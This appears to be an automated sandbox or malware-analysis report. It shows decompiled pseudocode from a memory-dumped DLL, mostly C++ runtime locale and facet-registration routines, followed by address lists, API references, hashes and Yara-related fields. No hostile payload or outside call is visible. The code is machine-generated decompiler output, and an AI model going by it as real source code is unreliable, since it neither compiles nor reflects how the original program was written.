																																																	E6D4A3D74(_t770 - 0x20, 0x6d543504);
																																																	asm("int3");
																																																	E6D4A00AC(0x6d4e83cf, _t544, _t731, _t749, 0x14);
																																																	E6D486653(_t770 - 0x14, 0);
																																																	_t750 =  *0x6d546e00; // 0x0
																																																	 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
																																																	 *(_t770 - 0x10) = _t750;
																																																	_t446 = E6D46161C(0x6d546dac);
																																																	_t652 =  *((intOrPtr*)(_t770 + 8));
																																																	_t732 = E6D46171B( *((intOrPtr*)(_t770 + 8)), _t446);
																																																	__eflags = _t732;
																																																	if(_t732 != 0) {
																																																		L110:
																																																		E6D4866BA(_t770 - 0x14);
																																																		return E6D4A0075(_t732);
																																																	} else {
																																																		__eflags = _t750;
																																																		if(_t750 == 0) {
																																																			_push( *((intOrPtr*)(_t770 + 8)));
																																																			_push(_t770 - 0x10);
																																																			__eflags = E6D4915C4(_t544, _t652, _t715, _t732, _t750) - 0xffffffff;
																																																			if(__eflags == 0) {
																																																				E6D461438(_t770 - 0x20);
																																																				E6D4A3D74(_t770 - 0x20, 0x6d543504);
																																																				asm("int3");
																																																				E6D4A00AC(0x6d4e83cf, _t544, _t732, _t750, 0x14);
																																																				E6D486653(_t770 - 0x14, 0);
																																																				_t751 =  *0x6d546dd0; // 0x0
																																																				 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
																																																				 *(_t770 - 0x10) = _t751;
																																																				_t459 = E6D46161C(0x6d546d60);
																																																				_t659 =  *((intOrPtr*)(_t770 + 8));
																																																				_t733 = E6D46171B( *((intOrPtr*)(_t770 + 8)), _t459);
																																																				__eflags = _t733;
																																																				if(_t733 != 0) {
																																																					L117:
																																																					E6D4866BA(_t770 - 0x14);
																																																					return E6D4A0075(_t733);
																																																				} else {
																																																					__eflags = _t751;
																																																					if(_t751 == 0) {
																																																						_push( *((intOrPtr*)(_t770 + 8)));
																																																						_push(_t770 - 0x10);
																																																						__eflags = E6D49162A(_t544, _t659, _t715, _t733, _t751) - 0xffffffff;
																																																						if(__eflags == 0) {
																																																							_t663 = _t770 - 0x20;
																																																							E6D461438(_t663);
																																																							E6D4A3D74(_t770 - 0x20, 0x6d543504);
																																																							asm("int3");
																																																							E6D4A00AC(0x6d4e851f, _t544, _t733, _t751, 4);
																																																							_t752 = _t663;
																																																							 *(_t770 - 0x10) = _t752;
																																																							 *((intOrPtr*)(_t752 + 4)) =  *((intOrPtr*)(_t770 + 0xc));
																																																							_push( *((intOrPtr*)(_t770 + 0x14)));
																																																							_t245 = _t770 - 4;
																																																							 *_t245 =  *(_t770 - 4) & 0x00000000;
																																																							__eflags =  *_t245;
																																																							 *_t752 = 0x6d4ec0c4;
																																																							 *((char*)(_t752 + 0x28)) =  *((intOrPtr*)(_t770 + 0x10));
																																																							E6D49542F(_t544, _t663, _t715, _t733, _t752,  *_t245);
																																																							return E6D4A0075(_t752,  *((intOrPtr*)(_t770 + 8)));
																																																						} else {
																																																							_t733 =  *(_t770 - 0x10);
																																																							 *(_t770 - 0x10) = _t733;
																																																							 *(_t770 - 4) = 1;
																																																							E6D486FD3(__eflags, _t733);
																																																							 *0x6d4ea26c();
																																																							 *((intOrPtr*)( *((intOrPtr*)( *_t733 + 4))))();
																																																							 *0x6d546dd0 = _t733;
																																																							goto L117;
																																																						}
																																																					} else {
																																																						_t733 = _t751;
																																																						goto L117;
																																																					}
																																																				}
																																																			} else {
																																																				_t732 =  *(_t770 - 0x10);
																																																				 *(_t770 - 0x10) = _t732;
																																																				 *(_t770 - 4) = 1;
																																																				E6D486FD3(__eflags, _t732);
																																																				 *0x6d4ea26c();
																																																				 *((intOrPtr*)( *((intOrPtr*)( *_t732 + 4))))();
																																																				 *0x6d546e00 = _t732;
																																																				goto L110;
																																																			}
																																																		} else {
																																																			_t732 = _t750;
																																																			goto L110;
																																																		}
																																																	}
																																																} else {
																																																	_t731 =  *(_t770 - 0x10);
																																																	 *(_t770 - 0x10) = _t731;
																																																	 *(_t770 - 4) = 1;
																																																	E6D486FD3(__eflags, _t731);
																																																	 *0x6d4ea26c();
																																																	 *((intOrPtr*)( *((intOrPtr*)( *_t731 + 4))))();
																																																	 *0x6d546dcc = _t731;
																																																	goto L103;
																																																}
																																															} else {
																																																_t731 = _t749;
																																																goto L103;
																																															}
																																														}
																																													} else {
																																														_t730 =  *(_t770 - 0x10);
																																														 *(_t770 - 0x10) = _t730;
																																														 *(_t770 - 4) = 1;
																																														E6D486FD3(__eflags, _t730);
																																														 *0x6d4ea26c();
																																														 *((intOrPtr*)( *((intOrPtr*)( *_t730 + 4))))();
																																														 *0x6d546dfc = _t730;
																																														goto L96;
																																													}
																																												} else {
																																													_t730 = _t748;
																																													goto L96;
																																												}
																																											}
																																										} else {
																																											_t729 =  *(_t770 - 0x10);
																																											 *(_t770 - 0x10) = _t729;
																																											 *(_t770 - 4) = 1;
																																											E6D486FD3(__eflags, _t729);
																																											 *0x6d4ea26c();
																																											 *((intOrPtr*)( *((intOrPtr*)( *_t729 + 4))))();
																																											 *0x6d546de0 = _t729;
																																											goto L89;
																																										}
																																									} else {
																																										_t729 = _t747;
																																										goto L89;
																																									}
																																								}
																																							} else {
																																								_t728 =  *(_t770 - 0x10);
																																								 *(_t770 - 0x10) = _t728;
																																								 *(_t770 - 4) = 1;
																																								E6D486FD3(__eflags, _t728);
																																								 *0x6d4ea26c();
																																								 *((intOrPtr*)( *((intOrPtr*)( *_t728 + 4))))();
																																								 *0x6d546ddc = _t728;
																																								goto L82;
																																							}
																																						} else {
																																							_t728 = _t746;
																																							goto L82;
																																						}
																																					}
																																				} else {
																																					_t727 =  *(_t770 - 0x10);
																																					 *(_t770 - 0x10) = _t727;
																																					 *(_t770 - 4) = 1;
																																					E6D486FD3(__eflags, _t727);
																																					 *0x6d4ea26c();
																																					 *((intOrPtr*)( *((intOrPtr*)( *_t727 + 4))))();
																																					 *0x6d546db0 = _t727;
																																					goto L75;
																																				}
																																			} else {
																																				_t727 = _t745;
																																				goto L75;
																																			}
																																		}
																																	} else {
																																		_t726 =  *(_t770 - 0x10);
																																		 *(_t770 - 0x10) = _t726;
																																		 *(_t770 - 4) = 1;
																																		E6D486FD3(__eflags, _t726);
																																		 *0x6d4ea26c();
																																		 *((intOrPtr*)( *((intOrPtr*)( *_t726 + 4))))();
																																		 *0x6d546dd8 = _t726;
																																		goto L68;
																																	}
																																} else {
																																	_t726 = _t744;
																																	goto L68;
																																}
																															}
																														} else {
																															_t725 =  *(_t770 - 0x10);
																															 *(_t770 - 0x10) = _t725;
																															 *(_t770 - 4) = 1;
																															E6D486FD3(__eflags, _t725);
																															 *0x6d4ea26c();
																															 *((intOrPtr*)( *((intOrPtr*)( *_t725 + 4))))();
																															 *0x6d546dc4 = _t725;
																															goto L61;
																														}
																													} else {
																														_t725 = _t743;
																														goto L61;
																													}
																												}
																											} else {
																												_t724 =  *(_t770 - 0x10);
																												 *(_t770 - 0x10) = _t724;
																												 *(_t770 - 4) = 1;
																												E6D486FD3(__eflags, _t724);
																												 *0x6d4ea26c();
																												 *((intOrPtr*)( *((intOrPtr*)( *_t724 + 4))))();
																												 *0x6d546dc8 = _t724;
																												goto L54;
																											}
																										} else {
																											_t724 = _t742;
																											goto L54;
																										}
																									}
																								} else {
																									_t723 =  *(_t770 - 0x10);
																									 *(_t770 - 0x10) = _t723;
																									 *(_t770 - 4) = 1;
																									E6D486FD3(__eflags, _t723);
																									 *0x6d4ea26c();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t723 + 4))))();
																									 *0x6d546df4 = _t723;
																									goto L47;
																								}
																							} else {
																								_t723 = _t741;
																								goto L47;
																							}
																						}
																					} else {
																						_t722 =  *(_t770 - 0x10);
																						 *(_t770 - 0x10) = _t722;
																						 *(_t770 - 4) = 1;
																						E6D486FD3(__eflags, _t722);
																						 *0x6d4ea26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t722 + 4))))();
																						 *0x6d546df8 = _t722;
																						goto L40;
																					}
																				} else {
																					_t722 = _t740;
																					goto L40;
																				}
																			}
																		} else {
																			_t721 =  *(_t770 - 0x10);
																			 *(_t770 - 0x10) = _t721;
																			 *(_t770 - 4) = 1;
																			E6D486FD3(__eflags, _t721);
																			 *0x6d4ea26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t721 + 4))))();
																			 *0x6d546dc0 = _t721;
																			goto L33;
																		}
																	} else {
																		_t721 = _t739;
																		goto L33;
																	}
																}
															} else {
																_t720 =  *(_t770 - 0x10);
																 *(_t770 - 0x10) = _t720;
																 *(_t770 - 4) = 1;
																E6D486FD3(__eflags, _t720);
																 *0x6d4ea26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t720 + 4))))();
																 *0x6d546df0 = _t720;
																goto L26;
															}
														} else {
															_t720 = _t738;
															goto L26;
														}
													}
												} else {
													_t719 =  *(_t770 - 0x10);
													 *(_t770 - 0x10) = _t719;
													 *(_t770 - 4) = 1;
													E6D486FD3(__eflags, _t719);
													 *0x6d4ea26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t719 + 4))))();
													 *0x6d546dbc = _t719;
													goto L19;
												}
											} else {
												_t719 = _t737;
												goto L19;
											}
										}
									} else {
										_t718 =  *(_t770 - 0x10);
										 *(_t770 - 0x10) = _t718;
										 *(_t770 - 4) = 1;
										E6D486FD3(__eflags, _t718);
										 *0x6d4ea26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t718 + 4))))();
										 *0x6d546dec = _t718;
										goto L12;
									}
								} else {
									_t718 = _t736;
									goto L12;
								}
							}
						} else {
							_t717 =  *(_t770 - 0x10);
							 *(_t770 - 0x10) = _t717;
							 *(_t770 - 4) = 1;
							E6D486FD3(__eflags, _t717);
							 *0x6d4ea26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t717 + 4))))();
							 *0x6d546db8 = _t717;
							goto L5;
						}
					} else {
						_t717 = _t735;
						goto L5;
					}
				}
			}

0x6d48f229
0x6d48f229
0x6d48f230
0x6d48f23a
0x6d48f23f
0x6d48f24a
0x6d48f24e
0x6d48f251
0x6d48f256
0x6d48f25a
0x6d48f25f
0x6d48f263
0x6d48f2a8
0x6d48f2ab
0x6d48f2b7
0x6d48f265
0x6d48f267
0x6d48f26d
0x6d48f273
0x6d48f27b
0x6d48f27e
0x6d48f2bb
0x6d48f2c9
0x6d48f2ce
0x6d48f2d6
0x6d48f2e0
0x6d48f2e5
0x6d48f2f0
0x6d48f2f4
0x6d48f2f7
0x6d48f2fc
0x6d48f305
0x6d48f307
0x6d48f309
0x6d48f34e
0x6d48f351
0x6d48f35d
0x6d48f30b
0x6d48f30b
0x6d48f30d
0x6d48f313
0x6d48f319
0x6d48f321
0x6d48f324
0x6d48f361
0x6d48f36f
0x6d48f374
0x6d48f37c
0x6d48f386
0x6d48f38b
0x6d48f396
0x6d48f39a
0x6d48f39d
0x6d48f3a2
0x6d48f3ab
0x6d48f3ad
0x6d48f3af
0x6d48f3f4
0x6d48f3f7
0x6d48f403
0x6d48f3b1
0x6d48f3b1
0x6d48f3b3
0x6d48f3b9
0x6d48f3bf
0x6d48f3c7
0x6d48f3ca
0x6d48f407
0x6d48f415
0x6d48f41a
0x6d48f422
0x6d48f42c
0x6d48f431
0x6d48f43c
0x6d48f440
0x6d48f443
0x6d48f448
0x6d48f451
0x6d48f453
0x6d48f455
0x6d48f49a
0x6d48f49d
0x6d48f4a9
0x6d48f457
0x6d48f457
0x6d48f459
0x6d48f45f
0x6d48f465
0x6d48f46d
0x6d48f470
0x6d48f4ad
0x6d48f4bb
0x6d48f4c0
0x6d48f4c8
0x6d48f4d2
0x6d48f4d7
0x6d48f4e2
0x6d48f4e6
0x6d48f4e9
0x6d48f4ee
0x6d48f4f7
0x6d48f4f9
0x6d48f4fb
0x6d48f540
0x6d48f543
0x6d48f54f
0x6d48f4fd
0x6d48f4fd
0x6d48f4ff
0x6d48f505
0x6d48f50b
0x6d48f513
0x6d48f516
0x6d48f553
0x6d48f561
0x6d48f566
0x6d48f56e
0x6d48f578
0x6d48f57d
0x6d48f588
0x6d48f58c
0x6d48f58f
0x6d48f594
0x6d48f59d
0x6d48f59f
0x6d48f5a1
0x6d48f5e6
0x6d48f5e9
0x6d48f5f5
0x6d48f5a3
0x6d48f5a3
0x6d48f5a5
0x6d48f5ab
0x6d48f5b1
0x6d48f5b9
0x6d48f5bc
0x6d48f5f9
0x6d48f607
0x6d48f60c
0x6d48f614
0x6d48f61e
0x6d48f623
0x6d48f62e
0x6d48f632
0x6d48f635
0x6d48f63a
0x6d48f643
0x6d48f645
0x6d48f647
0x6d48f68c
0x6d48f68f
0x6d48f69b
0x6d48f649
0x6d48f649
0x6d48f64b
0x6d48f651
0x6d48f657
0x6d48f65f
0x6d48f662
0x6d48f69f
0x6d48f6ad
0x6d48f6b2
0x6d48f6ba
0x6d48f6c4
0x6d48f6c9
0x6d48f6d4
0x6d48f6d8
0x6d48f6db
0x6d48f6e0
0x6d48f6e9
0x6d48f6eb
0x6d48f6ed
0x6d48f732
0x6d48f735
0x6d48f741
0x6d48f6ef
0x6d48f6ef
0x6d48f6f1
0x6d48f6f7
0x6d48f6fd
0x6d48f705
0x6d48f708
0x6d48f745
0x6d48f753
0x6d48f758
0x6d48f760
0x6d48f76a
0x6d48f76f
0x6d48f77a
0x6d48f77e
0x6d48f781
0x6d48f786
0x6d48f78f
0x6d48f791
0x6d48f793
0x6d48f7d8
0x6d48f7db
0x6d48f7e7
0x6d48f795
0x6d48f795
0x6d48f797
0x6d48f79d
0x6d48f7a3
0x6d48f7ab
0x6d48f7ae
0x6d48f7eb
0x6d48f7f9
0x6d48f7fe
0x6d48f806
0x6d48f810
0x6d48f815
0x6d48f820
0x6d48f824
0x6d48f827
0x6d48f82c
0x6d48f835
0x6d48f837
0x6d48f839
0x6d48f87e
0x6d48f881
0x6d48f88d
0x6d48f83b
0x6d48f83b
0x6d48f83d
0x6d48f843
0x6d48f849
0x6d48f851
0x6d48f854
0x6d48f891
0x6d48f89f
0x6d48f8a4
0x6d48f8ac
0x6d48f8b6
0x6d48f8bb
0x6d48f8c6
0x6d48f8ca
0x6d48f8cd
0x6d48f8d2
0x6d48f8db
0x6d48f8dd
0x6d48f8df
0x6d48f924
0x6d48f927
0x6d48f933
0x6d48f8e1
0x6d48f8e1
0x6d48f8e3
0x6d48f8e9
0x6d48f8ef
0x6d48f8f7
0x6d48f8fa
0x6d48f937
0x6d48f945
0x6d48f94a
0x6d48f952
0x6d48f95c
0x6d48f961
0x6d48f96c
0x6d48f970
0x6d48f973
0x6d48f978
0x6d48f981
0x6d48f983
0x6d48f985
0x6d48f9ca
0x6d48f9cd
0x6d48f9d9
0x6d48f987
0x6d48f987
0x6d48f989
0x6d48f98f
0x6d48f995
0x6d48f99d
0x6d48f9a0
0x6d48f9dd
0x6d48f9eb
0x6d48f9f0
0x6d48f9f8
0x6d48fa02
0x6d48fa07
0x6d48fa12
0x6d48fa16
0x6d48fa19
0x6d48fa1e
0x6d48fa27
0x6d48fa29
0x6d48fa2b
0x6d48fa70
0x6d48fa73
0x6d48fa7f
0x6d48fa2d
0x6d48fa2d
0x6d48fa2f
0x6d48fa35
0x6d48fa3b
0x6d48fa43
0x6d48fa46
0x6d48fa83
0x6d48fa91
0x6d48fa96
0x6d48fa9e
0x6d48faa8
0x6d48faad
0x6d48fab8
0x6d48fabc
0x6d48fabf
0x6d48fac4
0x6d48facd
0x6d48facf
0x6d48fad1
0x6d48fb16
0x6d48fb19
0x6d48fb25
0x6d48fad3
0x6d48fad3
0x6d48fad5
0x6d48fadb
0x6d48fae1
0x6d48fae9
0x6d48faec
0x6d48fb29
0x6d48fb37
0x6d48fb3c
0x6d48fb44
0x6d48fb4e
0x6d48fb53
0x6d48fb5e
0x6d48fb62
0x6d48fb65
0x6d48fb6a
0x6d48fb73
0x6d48fb75
0x6d48fb77
0x6d48fbbc
0x6d48fbbf
0x6d48fbcb
0x6d48fb79
0x6d48fb79
0x6d48fb7b
0x6d48fb81
0x6d48fb87
0x6d48fb8f
0x6d48fb92
0x6d48fbcf
0x6d48fbdd
0x6d48fbe2
0x6d48fbea
0x6d48fbf4
0x6d48fbf9
0x6d48fc04
0x6d48fc08
0x6d48fc0b
0x6d48fc10
0x6d48fc19
0x6d48fc1b
0x6d48fc1d
0x6d48fc62
0x6d48fc65
0x6d48fc71
0x6d48fc1f
0x6d48fc1f
0x6d48fc21
0x6d48fc27
0x6d48fc2d
0x6d48fc35
0x6d48fc38
0x6d48fc75
0x6d48fc83
0x6d48fc88
0x6d48fc90
0x6d48fc9a
0x6d48fc9f
0x6d48fcaa
0x6d48fcae
0x6d48fcb1
0x6d48fcb6
0x6d48fcbf
0x6d48fcc1
0x6d48fcc3
0x6d48fd08
0x6d48fd0b
0x6d48fd17
0x6d48fcc5
0x6d48fcc5
0x6d48fcc7
0x6d48fccd
0x6d48fcd3
0x6d48fcdb
0x6d48fcde
0x6d48fd18
0x6d48fd1b
0x6d48fd29
0x6d48fd2e
0x6d48fd36
0x6d48fd3b
0x6d48fd3d
0x6d48fd43
0x6d48fd46
0x6d48fd4f
0x6d48fd4f
0x6d48fd4f
0x6d48fd53
0x6d48fd59
0x6d48fd5c
0x6d48fd68
0x6d48fce0
0x6d48fce0
0x6d48fce3
0x6d48fce7
0x6d48fceb
0x6d48fcf8
0x6d48fd00
0x6d48fd02
0x00000000
0x6d48fd02
0x6d48fcc9
0x6d48fcc9
0x00000000
0x6d48fcc9
0x6d48fcc7
0x6d48fc3a
0x6d48fc3a
0x6d48fc3d
0x6d48fc41
0x6d48fc45
0x6d48fc52
0x6d48fc5a
0x6d48fc5c
0x00000000
0x6d48fc5c
0x6d48fc23
0x6d48fc23
0x00000000
0x6d48fc23
0x6d48fc21
0x6d48fb94
0x6d48fb94
0x6d48fb97
0x6d48fb9b
0x6d48fb9f
0x6d48fbac
0x6d48fbb4
0x6d48fbb6
0x00000000
0x6d48fbb6
0x6d48fb7d
0x6d48fb7d
0x00000000
0x6d48fb7d
0x6d48fb7b
0x6d48faee
0x6d48faee
0x6d48faf1
0x6d48faf5
0x6d48faf9
0x6d48fb06
0x6d48fb0e
0x6d48fb10
0x00000000
0x6d48fb10
0x6d48fad7
0x6d48fad7
0x00000000
0x6d48fad7
0x6d48fad5
0x6d48fa48
0x6d48fa48
0x6d48fa4b
0x6d48fa4f
0x6d48fa53
0x6d48fa60
0x6d48fa68
0x6d48fa6a
0x00000000
0x6d48fa6a
0x6d48fa31
0x6d48fa31
0x00000000
0x6d48fa31
0x6d48fa2f
0x6d48f9a2
0x6d48f9a2
0x6d48f9a5
0x6d48f9a9
0x6d48f9ad
0x6d48f9ba
0x6d48f9c2
0x6d48f9c4
0x00000000
0x6d48f9c4
0x6d48f98b
0x6d48f98b
0x00000000
0x6d48f98b
0x6d48f989
0x6d48f8fc
0x6d48f8fc
0x6d48f8ff
0x6d48f903
0x6d48f907
0x6d48f914
0x6d48f91c
0x6d48f91e
0x00000000
0x6d48f91e
0x6d48f8e5
0x6d48f8e5
0x00000000
0x6d48f8e5
0x6d48f8e3
0x6d48f856
0x6d48f856
0x6d48f859
0x6d48f85d
0x6d48f861
0x6d48f86e
0x6d48f876
0x6d48f878
0x00000000
0x6d48f878
0x6d48f83f
0x6d48f83f
0x00000000
0x6d48f83f
0x6d48f83d
0x6d48f7b0
0x6d48f7b0
0x6d48f7b3
0x6d48f7b7
0x6d48f7bb
0x6d48f7c8
0x6d48f7d0
0x6d48f7d2
0x00000000
0x6d48f7d2
0x6d48f799
0x6d48f799
0x00000000
0x6d48f799
0x6d48f797
0x6d48f70a
0x6d48f70a
0x6d48f70d
0x6d48f711
0x6d48f715
0x6d48f722
0x6d48f72a
0x6d48f72c
0x00000000
0x6d48f72c
0x6d48f6f3
0x6d48f6f3
0x00000000
0x6d48f6f3
0x6d48f6f1
0x6d48f664
0x6d48f664
0x6d48f667
0x6d48f66b
0x6d48f66f
0x6d48f67c
0x6d48f684
0x6d48f686
0x00000000
0x6d48f686
0x6d48f64d
0x6d48f64d
0x00000000
0x6d48f64d
0x6d48f64b
0x6d48f5be
0x6d48f5be
0x6d48f5c1
0x6d48f5c5
0x6d48f5c9
0x6d48f5d6
0x6d48f5de
0x6d48f5e0
0x00000000
0x6d48f5e0
0x6d48f5a7
0x6d48f5a7
0x00000000
0x6d48f5a7
0x6d48f5a5
0x6d48f518
0x6d48f518
0x6d48f51b
0x6d48f51f
0x6d48f523
0x6d48f530
0x6d48f538
0x6d48f53a
0x00000000
0x6d48f53a
0x6d48f501
0x6d48f501
0x00000000
0x6d48f501
0x6d48f4ff
0x6d48f472
0x6d48f472
0x6d48f475
0x6d48f479
0x6d48f47d
0x6d48f48a
0x6d48f492
0x6d48f494
0x00000000
0x6d48f494
0x6d48f45b
0x6d48f45b
0x00000000
0x6d48f45b
0x6d48f459
0x6d48f3cc
0x6d48f3cc
0x6d48f3cf
0x6d48f3d3
0x6d48f3d7
0x6d48f3e4
0x6d48f3ec
0x6d48f3ee
0x00000000
0x6d48f3ee
0x6d48f3b5
0x6d48f3b5
0x00000000
0x6d48f3b5
0x6d48f3b3
0x6d48f326
0x6d48f326
0x6d48f329
0x6d48f32d
0x6d48f331
0x6d48f33e
0x6d48f346
0x6d48f348
0x00000000
0x6d48f348
0x6d48f30f
0x6d48f30f
0x00000000
0x6d48f30f
0x6d48f30d
0x6d48f280
0x6d48f280
0x6d48f283
0x6d48f287
0x6d48f28b
0x6d48f298
0x6d48f2a0
0x6d48f2a2
0x00000000
0x6d48f2a2
0x6d48f269
0x6d48f269
0x00000000
0x6d48f269
0x6d48f267

APIs

__EH_prolog3.LIBCMT ref: 6D48F230
std::_Lockit::_Lockit.LIBCPMT ref: 6D48F23A
int.LIBCPMT ref: 6D48F251

Part of subcall function 6D46161C: std::_Lockit::_Lockit.LIBCPMT ref: 6D46162D
Part of subcall function 6D46161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6D461647

messages.LIBCPMT ref: 6D48F274
std::_Facet_Register.LIBCPMT ref: 6D48F28B
std::_Lockit::~_Lockit.LIBCPMT ref: 6D48F2AB
__CxxThrowException@8.LIBVCRUNTIME ref: 6D48F2C9

Strings

lmTm, xrefs: 6D48F245

Memory Dump Source

Source File: 00000000.00000002.917299629.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000000.00000002.917294141.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.917348475.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.925206892.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.927426246.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.928422377.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowmessages
String ID: lmTm
API String ID: 438560357-4251929185
Opcode ID: 3bc7f7ec8e73072a3ffcbd582abafe65f7aecae566a2dcd9908e461a33ff6eef
Instruction ID: 5795e35fcce4501b48af2c2e705dcfe960ea6ccc4669932d51686c91099163e0
Opcode Fuzzy Hash: 3bc7f7ec8e73072a3ffcbd582abafe65f7aecae566a2dcd9908e461a33ff6eef
Instruction Fuzzy Hash: BA11E0768082199BCF01EBA0C844EEDB774AF94314F2A410CD611BB395CB75DE0187E1

Uniqueness

Uniqueness Score: -1.00%

Function 6D4CE984, Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 274
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E6D4CE984(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, intOrPtr _a4, signed int _a8, intOrPtr _a12) {
				signed int _v8;
				short _v270;
				short _v272;
				char _v528;
				char _v700;
				signed int _v704;
				signed int _v708;
				short _v710;
				signed int* _v712;
				signed int _v716;
				signed int _v720;
				signed int _v724;
				signed int* _v728;
				signed int _v732;
				signed int _v736;
				signed int _v740;
				signed int _v744;
				signed int _t151;
				void* _t158;
				signed int _t159;
				signed int _t160;
				intOrPtr _t161;
				signed int _t164;
				signed int _t168;
				signed int _t169;
				intOrPtr* _t171;
				intOrPtr _t172;
				signed int _t175;
				signed int _t176;
				signed int _t178;
				signed int _t198;
				signed int _t199;
				signed int _t202;
				signed int _t207;
				signed int _t210;
				signed int _t216;
				intOrPtr* _t217;
				signed int _t230;
				signed int _t233;
				intOrPtr* _t234;
				signed int _t236;
				signed int* _t240;
				intOrPtr _t249;
				signed int _t254;
				signed int _t256;
				void* _t257;
				signed int _t260;
				signed int* _t261;
				intOrPtr* _t262;
				short _t263;
				signed int _t265;
				signed int _t267;
				void* _t269;
				void* _t271;

				_t265 = _t267;
				_t151 =  *0x6d54506c; // 0x9d44929c
				_v8 = _t151 ^ _t265;
				_push(__ebx);
				_t210 = _a8;
				_push(__esi);
				_push(__edi);
				_t249 = _a4;
				_v744 = _t210;
				_v728 = E6D4CD5FF(_t210, __ecx, __edx) + 0x278;
				_t158 = E6D4CDE92(_t210, __edx, _t249, _a12, _a12,  &_v272, 0x83,  &_v700, 0x55,  &_v708);
				_t269 = _t267 - 0x2e4 + 0x18;
				if(_t158 != 0) {
					_t11 = _t210 + 2; // 0x6
					_t254 = _t11 << 4;
					__eflags = _t254;
					_t159 =  &_v272;
					_v716 = _t254;
					_t247 =  *(_t254 + _t249);
					_t216 =  *(_t254 + _t249);
					while(1) {
						_v704 = _v704 & 0x00000000;
						__eflags =  *_t159 -  *_t216;
						_t256 = _v716;
						if( *_t159 !=  *_t216) {
							break;
						}
						__eflags =  *_t159;
						if( *_t159 == 0) {
							L9:
							_t160 = _v704;
						} else {
							_t263 =  *((intOrPtr*)(_t159 + 2));
							__eflags = _t263 -  *((intOrPtr*)(_t216 + 2));
							_v710 = _t263;
							_t256 = _v716;
							if(_t263 !=  *((intOrPtr*)(_t216 + 2))) {
								break;
							} else {
								_t159 = _t159 + 4;
								_t216 = _t216 + 4;
								__eflags = _v710;
								if(_v710 != 0) {
									continue;
								} else {
									goto L9;
								}
							}
						}
						L11:
						__eflags = _t160;
						if(_t160 != 0) {
							_t217 =  &_v272;
							_t247 = _t217 + 2;
							do {
								_t161 =  *_t217;
								_t217 = _t217 + 2;
								__eflags = _t161 - _v704;
							} while (_t161 != _v704);
							_v720 = (_t217 - _t247 >> 1) + 1;
							_t164 = E6D4CF26D(_t217 - _t247 >> 1, 4 + ((_t217 - _t247 >> 1) + 1) * 2);
							_v732 = _t164;
							__eflags = _t164;
							if(_t164 == 0) {
								goto L2;
							} else {
								_v724 =  *((intOrPtr*)(_t256 + _t249));
								_t35 = _t210 * 4; // 0xe764e850
								_v736 =  *((intOrPtr*)(_t249 + _t35 + 0xa0));
								_t38 = _t249 + 8; // 0x8b018b
								_v740 =  *_t38;
								_t226 =  &_v272;
								_v712 = _t164 + 4;
								_t168 = E6D4C91A7(_t164 + 4, _v720,  &_v272);
								_t271 = _t269 + 0xc;
								__eflags = _t168;
								if(_t168 != 0) {
									_t169 = _v704;
									_push(_t169);
									_push(_t169);
									_push(_t169);
									_push(_t169);
									_push(_t169);
									E6D4C2188();
									asm("int3");
									_t171 =  *0x6d5476f0; // 0x15b6430
									 *0x6d545108 =  *((intOrPtr*)(_t171 + 0x88));
									 *0x6d5451c0 =  *_t171;
									_t172 =  *((intOrPtr*)(_t171 + 4));
									 *0x6d5451ec = _t172;
									return _t172;
								} else {
									__eflags = _v272 - 0x43;
									 *((intOrPtr*)(_t256 + _t249)) = _v712;
									if(_v272 != 0x43) {
										L20:
										_t175 = E6D4CDB3B(_t210, _t226, _t249,  &_v700);
										_t230 = _v704;
										 *(_t249 + 0xa0 + _t210 * 4) = _t175;
									} else {
										__eflags = _v270;
										if(_v270 != 0) {
											goto L20;
										} else {
											_t230 = _v704;
											 *(_t249 + 0xa0 + _t210 * 4) = _t230;
										}
									}
									__eflags = _t210 - 2;
									if(_t210 != 2) {
										__eflags = _t210 - 1;
										if(_t210 != 1) {
											__eflags = _t210 - 5;
											if(_t210 == 5) {
												 *((intOrPtr*)(_t249 + 0x14)) = _v708;
											}
										} else {
											 *((intOrPtr*)(_t249 + 0x10)) = _v708;
										}
									} else {
										_t261 = _v728;
										_t247 = _t230;
										_t240 = _t261;
										 *(_t249 + 8) = _v708;
										_v712 = _t261;
										_v720 = _t261[8];
										_v708 = _t261[9];
										while(1) {
											_t64 = _t249 + 8; // 0x8b018b
											__eflags =  *_t64 -  *_t240;
											if( *_t64 ==  *_t240) {
												break;
											}
											_t262 = _v712;
											_t247 = _t247 + 1;
											_t207 =  *_t240;
											 *_t262 = _v720;
											_v708 = _t240[1];
											_t240 = _t262 + 8;
											 *((intOrPtr*)(_t262 + 4)) = _v708;
											_t210 = _v744;
											_t261 = _v728;
											_v720 = _t207;
											_v712 = _t240;
											__eflags = _t247 - 5;
											if(_t247 < 5) {
												continue;
											} else {
											}
											L28:
											__eflags = _t247 - 5;
											if(__eflags == 0) {
												_t88 = _t249 + 8; // 0x8b018b
												_t198 = E6D4D6102(_t210, _t247, _t249, __eflags, _v704, 1, 0x6d4f0ea8, 0x7f,  &_v528,  *_t88, 1);
												_t271 = _t271 + 0x1c;
												__eflags = _t198;
												_t199 = _v704;
												if(_t198 == 0) {
													_t261[1] = _t199;
												} else {
													do {
														 *(_t265 + _t199 * 2 - 0x20c) =  *(_t265 + _t199 * 2 - 0x20c) & 0x000001ff;
														_t199 = _t199 + 1;
														__eflags = _t199 - 0x7f;
													} while (_t199 < 0x7f);
													_t202 = E6D4A1C3C( &_v528,  *0x6d5451e8, 0xfe);
													_t271 = _t271 + 0xc;
													__eflags = _t202;
